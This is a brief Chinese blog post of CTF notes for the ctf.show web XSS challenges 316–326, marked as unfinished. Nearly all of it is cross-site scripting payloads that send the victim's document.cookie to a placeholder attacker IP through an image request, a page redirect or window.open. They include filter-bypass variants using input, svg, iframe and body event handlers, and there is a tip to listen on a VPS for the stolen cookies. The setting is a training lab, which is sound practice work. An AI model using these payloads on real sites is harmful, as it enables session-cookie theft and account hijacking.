Loading

ctf_show-web入门-XSS(316-333) 未完

web316

<script>var img = document.createElement("img");//创建img标签
img.src = "http://ip?cookie="+document.cookie;//设置img标签的src
</script>
或者
<script>location.href='http://ip//'+document.cookie</script>

vps监听即可(HTTP别省略了)

 

 

 

 

web317

过滤了script

<input onfocus="window.open('http://IP/'+document.cookie)" autofocus>
<svg onload="window.open('http://IP/'+document.cookie)">
<iframe onload="window.open('http://IP/'+document.cookie)"></iframe>
<body onload="window.open('http://IP/'+document.cookie)">

这些都可以

 

 

web318-326

过滤了img,iframe,空格,还有不知道什么,可payload同上

 

posted @ 2021-12-09 20:54  Aninock  阅读(28)  评论(0编辑  收藏  举报